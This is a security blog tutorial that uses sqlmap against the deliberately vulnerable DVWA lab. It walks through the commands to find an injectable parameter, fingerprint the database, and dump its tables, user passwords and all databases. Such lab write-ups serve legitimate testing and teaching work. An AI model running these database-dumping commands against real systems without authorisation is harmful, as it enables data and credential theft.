Automating SQL Injection Exploitation with sqlmap

23 Apr 2017 . category: tech . Comments
#security #redteam #dvwa

In the previous post, we demonstrated how to access user passwords in DVWA by exploiting its SQL Injection vulnerability. This time, we’ll use sqlmap, a powerful and easy to use tool that automates the SQL injection exploitation process, allowing us to dump entire databases with minimal effort.

In the previous post, we guessed that the column in the users table containing passwords was called password. However, if our guess had been incorrect, we would have needed to inject a UNION SQL query on the information schema database of the DBMS to retrieve the tables and columns of the targeted database. This process differs for each DBMS and can be time-consuming. Fortunately, sqlmap automates this process and more.

With sqlmap, we can automatically detect injectable parameters in a web application and dump whole databases, tables, and columns. It also has built-in exploitation and password cracking automation features, though we won’t be exploring those in this post as we will be using Metasploit and Hashcat for these purposes. Instead, we will focus on exploiting the same SQL injection vulnerability as in the previous post, performing information gathering on the server, and dumping all its databases.

First, we’ll start by intercepting the HTTP request of the SQL injection form using Burp and saving it to a request file. Then we’ll pass this file to sqlmap, which will detect the injectable parameters that it can inspect for SQL injections:

sqlmap

To start using sqlmap, we need to provide it with the request file we saved earlier. Sqlmap can automatically parse the file and detect parameters that may be vulnerable to SQL injection:

sqlmap -r request

sqlmap

When sqlmap finds an injectable parameter, it prompts us to choose whether to skip payloads for the rest of the database management system (in this case, MySQL). Then sqlmap will do information gathering about the system, such as the version, current database, and current user.

sqlmap

If sqlmap successfully identifies an injectable parameter, it will ask if we want to continue searching for more. However, if we’ve found what we need, we can stop and move on to the next step.

sqlmap

Even after sqlmap exits, it will have saved information about the request for future use. Let’s use sqlmap to gather more information, such as the database management system version, the current database, and the current user:

sqlmap -r request --banner --current-user --current-db

sqlmap

Now, let’s list the tables in the dvwa database:

sqlmap -r request -D dvwa --tables

sqlmap

Next, let’s list the columns in the users table:

sqlmap -r request -D dvwa -T users --columns

sqlmap

We can also dump the contents of the user and password columns in the “users” table:

sqlmap -r request -D dvwa -T users -C user,password --dump

sqlmap

However, if we want to dump the entire dvwa database (which is small in our case), we can use the following command:

sqlmap -r request -D dvwa --dump

sqlmap

As a bonus, we can also list all databases on the server:

sqlmap -r request -D dvwa --dbs

sqlmap

And, if we want to dump all databases on the server, we can use the following command:

sqlmap -r request --dump-all

In case you didn’t notice, the stored XSS that we discovered in a past post, ca be seen in the dumped data as well.


Me

A creative thinker who is not afraid to challenge the norm. His diverse track record includes failed startups, approved patents and scientific publications in top conferences and journals. On a mission to protect what matters most to you.